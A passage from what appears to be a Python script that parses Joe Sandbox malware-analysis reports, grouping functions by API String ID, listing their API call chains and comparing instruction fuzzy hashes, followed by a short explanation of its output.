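            if key == "Instruction Fuzzy Hash":
                blocks.append(cur)
                cur = _new_block()
        elif section == "Memory Dump Source" and key == "Source File":
            cur["source"] = val
        elif section == "Joe Sandbox IDA Plugin" and key == "Snapshot File":
            cur["snapshot"] = val
    return blocks


def api_chain(block):
    """Ordered 'Api.MODULE' names, including calls reached through subcalls."""
    return [f'{c["api"]}.{c["module"]}' for c in block["apis"]]


def group_by_api_string_id(blocks):
    """Functions sharing an API String ID use the same API set and strings."""
    groups = defaultdict(list)
    for b in blocks:
        groups[b["similarity"].get("API String ID")].append(b)
    return dict(groups)


def fuzzy_distance(a, b):
    """Nibble-wise Hamming distance of two equal-length hex fuzzy hashes.
    Assumption: a crude closeness indicator only; the report does not say how
    the Instruction Fuzzy Hash is built, so this is not its similarity metric."""
    if len(a) != len(b):
        raise ValueError("fuzzy hashes must have equal length")
    return sum(x != y for x, y in zip(a.upper(), b.upper()))


if __name__ == "__main__":
    parsed = parse_blocks(SAMPLE)
    for sid, members in group_by_api_string_id(parsed).items():
        chains = [api_chain(b) for b in members if b["apis"]]
        print(sid, len(members), "function(s)", chains[0] if chains else "(APIs not in section)")
```

Run stand-alone it prints one line per API String ID with the number of functions carrying it and their call chain; the Shell_TrayWnd pair lands in one group of two, and their Instruction Fuzzy Hashes are far closer to each other than either is to the MultiByteToWideChar function's.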